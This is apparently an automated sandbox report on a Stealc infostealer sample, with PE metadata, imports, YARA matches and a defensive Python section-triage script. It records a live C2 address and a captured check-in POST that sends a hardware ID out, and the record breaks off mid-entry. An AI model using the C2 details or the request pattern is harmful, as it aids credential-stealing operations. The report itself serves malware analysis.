                                SHA-512:4D8E16C30ACA9DABB0CD60A0B43F61328382E7D961B8CC6018F21FF8E7F6520E646190BBA58B1B32AE5F01EE3406B96D08938283AC3BAA2E9DC78F7318305FFF
                                Malicious:false
                                Preview:regfD...D....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.;..A...............................................................................................................................................................................................................................................................................................................................................5..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.053538020345029
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:YLshJwBcrT.exe
                                File size:336'384 bytes
                                MD5:015ac525cdf1038d8ceb75ba43068da0
                                SHA1:dc28851e6a02c567dfeabcd3d642f06f5f569d5e
                                SHA256:33367a662e6fe40c4fc42063a7c676a376674552e4abde488a25695bcc211552
                                SHA512:7f913d1bbc987e65395c6f2f765e14bc91aacff1c45cefd53ce61d2799341a8235a17b9188ac167fa768e4702c4c0edc37eccd201ee08e54885b8d56598cf439
                                SSDEEP:6144:p4L2r6u4jXBszUaHqmXK6+ajmns9lU0RyuG41cB27mg8BjtvBj:aarrkBsQaH7+ajmn8pRk4qB4mRz
                                TLSH:9E64C05126F1AC17F3F7453A5975A6E8793BBDA7AE30C05E1200F68F0C726918A41B2F
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@.....................................h......................................Rich............PE..L....gQe...................
                                Icon Hash:17694db2b24d3117
                                Entrypoint:0x401667
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                Time Stamp:0x6551671D [Mon Nov 13 00:00:29 2023 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:0
                                File Version Major:5
                                File Version Minor:0
                                Subsystem Version Major:5
                                Subsystem Version Minor:0
                                Import Hash:fbc3e75f2d9f9185d8f077824c0d6c28
                                Instruction
                                call 00007F83DD22AAA4h
                                jmp 00007F83DD227EAEh
                                mov edi, edi
                                push ebp
                                mov ebp, esp
                                sub esp, 00000328h
                                mov dword ptr [004353C8h], eax
                                mov dword ptr [004353C4h], ecx
                                mov dword ptr [004353C0h], edx
                                mov dword ptr [004353BCh], ebx
                                mov dword ptr [004353B8h], esi
                                mov dword ptr [004353B4h], edi
                                mov word ptr [004353E0h], ss
                                mov word ptr [004353D4h], cs
                                mov word ptr [004353B0h], ds
                                mov word ptr [004353ACh], es
                                mov word ptr [004353A8h], fs
                                mov word ptr [004353A4h], gs
                                pushfd
                                pop dword ptr [004353D8h]
                                mov eax, dword ptr [ebp+00h]
                                mov dword ptr [004353CCh], eax
                                mov eax, dword ptr [ebp+04h]
                                mov dword ptr [004353D0h], eax
                                lea eax, dword ptr [ebp+08h]
                                mov dword ptr [004353DCh], eax
                                mov eax, dword ptr [ebp-00000320h]
                                mov dword ptr [00435318h], 00010001h
                                mov eax, dword ptr [004353D0h]
                                mov dword ptr [004352CCh], eax
                                mov dword ptr [004352C0h], C0000409h
                                mov dword ptr [004352C4h], 00000001h
                                mov eax, dword ptr [00434008h]
                                mov dword ptr [ebp-00000328h], eax
                                mov eax, dword ptr [0043400Ch]
                                mov dword ptr [ebp-00000324h], eax
                                call dword ptr [000000CCh]
                                Programming Language:
                                • [C++] VS2008 build 21022
                                • [ASM] VS2008 build 21022
                                • [ C ] VS2008 build 21022
                                • [IMP] VS2005 build 50727
                                • [RES] VS2008 build 21022
                                • [LNK] VS2008 build 21022
                                 Name | Virtual Address | Virtual Size | Is in Section
                                 IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_IMPORT | 0x336c4 | 0x3c | .rdata
                                 IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x112000 | 0x1d348 | .rsrc
                                 IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_TLS | 0x333f8 | 0x18 | .rdata
                                 IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_IAT | 0x32000 | 0x184 | .rdata
                                 IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                 Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                 .text | 0x1000 | 0x308cf | 0x30a00 | 505be99ef9c1f51c06b04f2b139bafe9 | False | 0.9252440151028277 | data | 7.872518755623235 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                 .rdata | 0x32000 | 0x1fa0 | 0x2000 | cbb94a8c54dfb9bbd30a01ee0dd3d905 | False | 0.3682861328125 | data | 5.598363170922723 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                 .data | 0x34000 | 0xda67c | 0x1400 | e5fedb9779fb3c99166803ddd4e59404 | False | 0.1677734375 | data | 1.8223650873157855 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                 .dotej | 0x10f000 | 0x7c | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                 .tls | 0x110000 | 0x51d | 0x600 | 53e979547d8c2ea86560ac45de08ae25 | False | 0.013020833333333334 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                 .beciluy | 0x111000 | 0x400 | 0x400 | 0f343b0931126a20f133d67c2b018a3b | False | 0.0166015625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                 .rsrc | 0x112000 | 0x14e348 | 0x1d400 | 7ee9c27840c459a68259c23cfe7e3698 | False | 0.4630492120726496 | data | 5.10753171212464 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
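The section table above shows .data with a virtual size of 0xda67c backed by only 0x1400 bytes of file data, a .text section at entropy 7.87, and two sections with made-up names (.dotej, .beciluy). Those are the static traces an analyst would expect from a sample the report flags for unpacking. The Python below is an added example, not part of the Joe Sandbox report: it parses raw IMAGE_SECTION_HEADER records (the general 40-byte structure, not just this file's rows) and flags sections that are far larger in memory than on disk, sections mapped writable and executable, and non-standard names. The headers it runs over are rebuilt from the table above; the PointerToRawData values are constructed for the demo because the report does not list file offsets.

```python
"""Section-table triage for the PE described above.

Added example, not Joe Sandbox code. The seven section headers are rebuilt
from the section table in this report (name, virtual address, virtual size,
raw size, characteristics); the PointerToRawData values are constructed for
the demo, because the report does not list file offsets.
"""
import struct
from typing import Dict, List, NamedTuple

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Names the Microsoft linker emits; anything else is worth a second look.
STANDARD_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".tls",
                  ".idata", ".edata", ".pdata", ".bss", ".CRT", ".didat"}

# IMAGE_SECTION_HEADER (40 bytes): Name[8], VirtualSize, VirtualAddress,
# SizeOfRawData, PointerToRawData, PointerToRelocations, PointerToLinenumbers,
# NumberOfRelocations, NumberOfLinenumbers, Characteristics.
SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")


class Section(NamedTuple):
    name: str
    virtual_size: int
    virtual_address: int
    raw_size: int
    raw_pointer: int
    characteristics: int


def parse_section_table(blob: bytes, count: int) -> List[Section]:
    """Decode `count` consecutive section headers starting at blob[0]."""
    out = []
    for i in range(count):
        f = SECTION_HEADER.unpack_from(blob, i * SECTION_HEADER.size)
        name = f[0].rstrip(b"\x00").decode("ascii", "replace")
        out.append(Section(name, f[1], f[2], f[3], f[4], f[9]))
    return out


def section_flags(sec: Section, ratio: float = 4.0) -> List[str]:
    """Return the anomalies a triage analyst would want called out."""
    flags = []
    c = sec.characteristics
    if c & IMAGE_SCN_MEM_WRITE and c & IMAGE_SCN_MEM_EXECUTE:
        flags.append("W+X")
    # A section far larger in memory than on disk is filled at runtime:
    # the usual home of an unpacked payload.
    if sec.raw_size and sec.virtual_size > ratio * sec.raw_size:
        flags.append("virtual size %.0fx raw size (runtime-filled)"
                     % (sec.virtual_size / sec.raw_size))
    if sec.name not in STANDARD_NAMES:
        flags.append("non-standard name")
    return flags


def analyze(blob: bytes, count: int) -> Dict[str, List[str]]:
    return {s.name: section_flags(s) for s in parse_section_table(blob, count)}


def build_header(name: str, vsize: int, va: int, rawsize: int,
                 rawptr: int, chars: int) -> bytes:
    """Pack one IMAGE_SECTION_HEADER (used here only to build the sample)."""
    return SECTION_HEADER.pack(name.encode().ljust(8, b"\x00"),
                               vsize, va, rawsize, rawptr, 0, 0, 0, 0, chars)


R, W, X = IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_EXECUTE
CODE, IDATA = IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA
# (name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData*, flags)
# *constructed: 0x400 of headers, then sections laid out back to back; they
#  end at 0x52200 = 336,384 bytes, the file size this report gives.
REPORT_SECTIONS = [
    (".text",    0x308cf,  0x001000, 0x30a00, 0x00400, CODE | X | R),
    (".rdata",   0x01fa0,  0x032000, 0x02000, 0x30e00, IDATA | R),
    (".data",    0xda67c,  0x034000, 0x01400, 0x32e00, IDATA | R | W),
    (".dotej",   0x0007c,  0x10f000, 0x00200, 0x34200, IDATA | R | W),
    (".tls",     0x0051d,  0x110000, 0x00600, 0x34400, IDATA | R | W),
    (".beciluy", 0x00400,  0x111000, 0x00400, 0x34a00, IDATA | R | W),
    (".rsrc",    0x14e348, 0x112000, 0x1d400, 0x34e00, IDATA | R),
]
SAMPLE_TABLE = b"".join(build_header(*row) for row in REPORT_SECTIONS)

if __name__ == "__main__":
    for name, flags in analyze(SAMPLE_TABLE, len(REPORT_SECTIONS)).items():
        print(f"{name:9s} {', '.join(flags) or 'ok'}")
```

On the rebuilt table this flags .data (about 175 times its raw size) and .rsrc (about 11 times), plus the two non-standard names .dotej and .beciluy; .text, .rdata and .tls pass. The ratio is a starting point, not a verdict: legitimate binaries also carry a large zero-initialised .data, so read the flag together with the entropy column (here .text at 7.87) and with the runtime signatures at the top of the report.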
                                 Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                 RT_CURSOR | 0x12a558 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.4276315789473684
                                 RT_ICON | 0x112a30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.5711620469083155
                                 RT_ICON | 0x1138d8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.641245487364621
                                 RT_ICON | 0x114180 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.6941244239631337
                                 RT_ICON | 0x114848 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.7514450867052023
                                 RT_ICON | 0x114db0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkish | Turkey | 0.5196058091286307
                                 RT_ICON | 0x117358 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkish | Turkey | 0.62406191369606
                                 RT_ICON | 0x118400 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkish | Turkey | 0.6311475409836066
                                 RT_ICON | 0x118d88 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkish | Turkey | 0.7659574468085106
                                 RT_ICON | 0x119268 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.39525586353944564
                                 RT_ICON | 0x11a110 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.4981949458483754
                                 RT_ICON | 0x11a9b8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.5172811059907834
                                 RT_ICON | 0x11b080 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.5549132947976878
                                 RT_ICON | 0x11b5e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Turkish | Turkey | 0.34813278008298754
                                 RT_ICON | 0x11db90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Turkish | Turkey | 0.3773452157598499
                                 RT_ICON | 0x11ec38 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Turkish | Turkey | 0.39918032786885244
                                 RT_ICON | 0x11f5c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Turkish | Turkey | 0.41312056737588654
                                 RT_ICON | 0x11faa0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Turkish | Turkey | 0.39792110874200426
                                 RT_ICON | 0x120948 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Turkish | Turkey | 0.5591155234657039
                                 RT_ICON | 0x1211f0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Turkish | Turkey | 0.6169354838709677
                                 RT_ICON | 0x1218b8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Turkish | Turkey | 0.6416184971098265
                                 RT_ICON | 0x121e20 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Turkish | Turkey | 0.43550656660412757
                                 RT_ICON | 0x122ec8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Turkish | Turkey | 0.42991803278688523
                                 RT_ICON | 0x123850 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Turkish | Turkey | 0.47606382978723405
                                 RT_ICON | 0x123d20 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.39525586353944564
                                 RT_ICON | 0x124bc8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.4981949458483754
                                 RT_ICON | 0x125470 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.5172811059907834
                                 RT_ICON | 0x125b38 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.5549132947976878
                                 RT_ICON | 0x1260a0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Turkish | Turkey | 0.34813278008298754
                                 RT_ICON | 0x128648 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Turkish | Turkey | 0.3773452157598499
                                 RT_ICON | 0x1296f0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Turkish | Turkey | 0.39918032786885244
                                 RT_ICON | 0x12a078 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Turkish | Turkey | 0.41312056737588654
                                 RT_STRING | 0x12a860 | 0x476 | data | | | 0.44921190893169877
                                 RT_STRING | 0x12acd8 | 0x504 | data | | | 0.45794392523364486
                                 RT_STRING | 0x12b1e0 | 0x6b4 | data | | | 0.4324009324009324
                                 RT_STRING | 0x12b898 | 0x760 | data | | | 0.4253177966101695
                                 RT_STRING | 0x12bff8 | 0x706 | data | | | 0.42880978865406005
                                 RT_STRING | 0x12c700 | 0x8b8 | data | | | 0.4211469534050179
                                 RT_STRING | 0x12cfb8 | 0x6d2 | data | | | 0.4306987399770905
                                 RT_STRING | 0x12d690 | 0x4a4 | data | | | 0.46380471380471383
                                 RT_STRING | 0x12db38 | 0x62e | data | | | 0.4361567635903919
                                 RT_STRING | 0x12e168 | 0x520 | data | | | 0.45198170731707316
                                 RT_STRING | 0x12e688 | 0x722 | data | | | 0.4244249726177437
                                 RT_STRING | 0x12edb0 | 0x564 | data | | | 0.4391304347826087
                                 RT_STRING | 0x12f318 | 0x2e | data | | | 0.6304347826086957
                                 RT_GROUP_CURSOR | 0x12a688 | 0x14 | data | | | 1.15
                                 RT_GROUP_ICON | 0x11fa28 | 0x76 | data | Turkish | Turkey | 0.6694915254237288
                                 RT_GROUP_ICON | 0x12a4e0 | 0x76 | data | Turkish | Turkey | 0.6694915254237288
                                 RT_GROUP_ICON | 0x1191f0 | 0x76 | data | Turkish | Turkey | 0.6610169491525424
                                 RT_GROUP_ICON | 0x123cb8 | 0x68 | data | Turkish | Turkey | 0.7211538461538461
                                 RT_VERSION | 0x12a6a0 | 0x1bc | data | | | 0.581081081081081
                                 DLL | Import
                                 KERNEL32.dll | SearchPathW, WriteConsoleOutputCharacterA, GetCommState, ReadConsoleA, InterlockedDecrement, QueryDosDeviceA, InterlockedCompareExchange, GetComputerNameW, GetTimeFormatA, ConnectNamedPipe, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, SetCommState, LoadLibraryW, GetConsoleMode, CopyFileW, ReadConsoleOutputW, GetConsoleAliasExesLengthW, FormatMessageW, GetSystemTimeAdjustment, DeleteVolumeMountPointW, HeapDestroy, GetFileAttributesW, GetBinaryTypeA, ReleaseSemaphore, GetShortPathNameA, GetLastError, GetLongPathNameW, GetProcAddress, SetStdHandle, BuildCommDCBW, GetNumaHighestNodeNumber, ResetEvent, LoadLibraryA, LocalAlloc, SetCalendarInfoW, FindAtomA, GetModuleFileNameA, GetDefaultCommConfigA, FatalAppExitA, GlobalReAlloc, GetVolumeInformationW, HeapAlloc, Sleep, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW
                                 USER32.dll | SetFocus
                                 Language of compilation system | Country where language is spoken | Map
                                 Turkish | Turkey |
                                 Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                 2024-10-08T07:21:12.143104+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 62.204.41.150 | 80 | TCP
                                 Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                 Oct 8, 2024 07:21:10.883476019 CEST | 49704 | 80 | 192.168.2.5 | 62.204.41.150
                                 Oct 8, 2024 07:21:10.888814926 CEST | 80 | 49704 | 62.204.41.150 | 192.168.2.5
                                 Oct 8, 2024 07:21:10.889111996 CEST | 49704 | 80 | 192.168.2.5 | 62.204.41.150
                                 Oct 8, 2024 07:21:10.889153957 CEST | 49704 | 80 | 192.168.2.5 | 62.204.41.150
                                 Oct 8, 2024 07:21:10.894277096 CEST | 80 | 49704 | 62.204.41.150 | 192.168.2.5
                                 Oct 8, 2024 07:21:11.587898016 CEST | 80 | 49704 | 62.204.41.150 | 192.168.2.5
                                 Oct 8, 2024 07:21:11.588126898 CEST | 49704 | 80 | 192.168.2.5 | 62.204.41.150
                                 Oct 8, 2024 07:21:11.593626976 CEST | 49704 | 80 | 192.168.2.5 | 62.204.41.150
                                 Oct 8, 2024 07:21:11.598903894 CEST | 80 | 49704 | 62.204.41.150 | 192.168.2.5
                                 Oct 8, 2024 07:21:12.142914057 CEST | 80 | 49704 | 62.204.41.150 | 192.168.2.5
                                 Oct 8, 2024 07:21:12.143104076 CEST | 49704 | 80 | 192.168.2.5 | 62.204.41.150
                                 Oct 8, 2024 07:21:17.147882938 CEST | 80 | 49704 | 62.204.41.150 | 192.168.2.5
                                 Oct 8, 2024 07:21:17.147989988 CEST | 49704 | 80 | 192.168.2.5 | 62.204.41.150
                                 Oct 8, 2024 07:21:34.565773010 CEST | 49704 | 80 | 192.168.2.5 | 62.204.41.150
                                 Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                 Oct 8, 2024 07:21:46.709901094 CEST | 53 | 53248 | 162.159.36.2 | 192.168.2.5
                                 Oct 8, 2024 07:21:47.217885017 CEST | 53 | 64059 | 1.1.1.1 | 192.168.2.5
                                • 62.204.41.150
                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                 0 | 192.168.2.5 | 49704 | 62.204.41.150 | 80 | 6780 | C:\Users\user\Desktop\YLshJwBcrT.exe
                                 Timestamp | Bytes transferred | Direction | Data
                                 Oct 8, 2024 07:21:10.889153957 CEST | 88 | OUT |
                                 GET / HTTP/1.1
                                 Host: 62.204.41.150
                                 Connection: Keep-Alive
                                 Cache-Control: no-cache
                                 Oct 8, 2024 07:21:11.587898016 CEST | 203 | IN |
                                 HTTP/1.1 200 OK
                                 Date: Tue, 08 Oct 2024 05:21:11 GMT
                                 Server: Apache/2.4.52 (Ubuntu)
                                 Content-Length: 0
                                 Keep-Alive: timeout=5, max=100
                                 Connection: Keep-Alive
                                 Content-Type: text/html; charset=UTF-8
                                 Oct 8, 2024 07:21:11.593626976 CEST | 419 | OUT |
                                 POST /edd20096ecef326d.php HTTP/1.1
                                 Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECB
                                 Host: 62.204.41.150
                                 Content-Length: 219
                                 Connection: Keep-Alive
                                 Cache-Control: no-cache
                                 Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 34 46 34 41 38 42 33 46 41 38 33 31 34 38 31 35 32 38 31 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 2d 2d 0d 0a
                                 Data Ascii: ------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="hwid"B64F4A8B3FA83148152816------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="build"default6_cap------GIEHIDHJDBFIIECAKECB--
                                 Oct 8, 2024 07:21:12.142914057 CEST | 210 | IN |
                                 HTTP/1.1 200 OK
                                 Date: Tue, 08 Oct 2024 05:21:11 GMT
                                 Server: Apache/2.4.52 (Ubuntu)
                                 Content-Length: 8
                                 Keep-Alive: timeout=5, max=99
                                 Connection: Keep-Alive
                                 Content-Type: text/html; charset=UTF-8
                                 Data Raw: 59 6d 78 76 59 32 73 3d
                                 Data Ascii: YmxvY2s=
                                 Data Ascii (base64-decoded): block


                                Target ID:0
                                Start time:01:21:01
                                Start date:08/10/2024
                                Path:C:\Users\user\Desktop\YLshJwBcrT.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\YLshJwBcrT.exe"
                                Imagebase:0x400000
                                File size:336'384 bytes
                                MD5 hash:015AC525CDF1038D8CEB75BA43068DA0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2342767053.000000000085A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2342788236.000000000088A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2063251996.0000000002330000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Target ID:4
                                Start time:01:21:05
                                Start date:08/10/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 812
                                Imagebase:0xb30000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:6
                                Start time:01:21:06
                                Start date:08/10/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 820
                                Imagebase:0xb30000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:8
                                Start time:01:21:07
                                Start date:08/10/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 812
                                Imagebase:0xb30000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:10
                                Start time:01:21:08
                                Start date:08/10/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 860
                                Imagebase:0xb30000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:12
                                Start time:01:21:08
                                Start date:08/10/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 984
                                Imagebase:0xb30000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:14
                                Start time:01:21:09
                                Start date:08/10/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 1008
                                Imagebase:0xb30000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
